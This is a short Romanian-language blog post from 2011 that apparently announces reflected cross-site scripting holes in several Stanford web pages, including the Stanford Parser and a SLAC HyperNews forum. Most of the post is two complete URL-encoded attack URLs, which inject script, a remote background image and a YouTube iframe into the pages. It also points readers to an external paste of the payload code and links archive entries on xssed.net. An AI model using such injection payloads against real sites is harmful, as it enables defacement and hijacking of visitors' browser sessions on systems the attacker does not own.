sâmbătă, 17 decembrie 2011

Stanford Parser XSS

http://nlp.stanford.edu:8080/parser/index.jsp

Put our code:

http://codepad.org/4NxXPFfq

and enter Parse.




+ Choco Bonus.

http://ncbolabs-dev1.stanford.edu:8080/parsetrees/execute.jsp?query=%22%3E%3Cbody%20background=%22http://www.lenagold.ru/fon/eda/shoko/shoko14.gif%22%3E%3Cscript%3Ealert%28%22Hmm..Chocolate.%20XSS%20By%20Sony%22%29%3C/script%3E%3Ciframe%20width=%22520%22%20height=%22415%22%20src=%22http://www.youtube.com/embed/5C24Grhhfy0%22%20frameborder=%220%22%20allowfullscreen%3E%3C/iframe%3E&type=string





+ xss on hypernews.slac.stanford.edu:


http://hypernews.slac.stanford.edu/HyperNews/geant4/view-members.pl?page=2%22%3E%3Cbody%20background=%22http://www.lenagold.ru/fon/ani/cat/raz/razcat34.jpg%22%3E%3Cscript%3Ealert%28%22xss%22%29%3C/script%3E%3Ciframe%20width=%22420%22%20height=%22315%22%20src=%22http://www.youtube.com/embed/QH2-TGUlwu4%22%20frameborder=%220%22%20allowfullscreen%3E%3C/iframe%3E&find=^B



http://vuln.xssed.net/2011/12/18/hypernews.slac.stanford.edu/
http://vuln.xssed.net/2011/12/17/ncbolabs-dev1.stanford.edu/

0 comentarii:

Trimiteți un comentariu

Rețineți: Numai membrii acestui blog pot posta comentarii.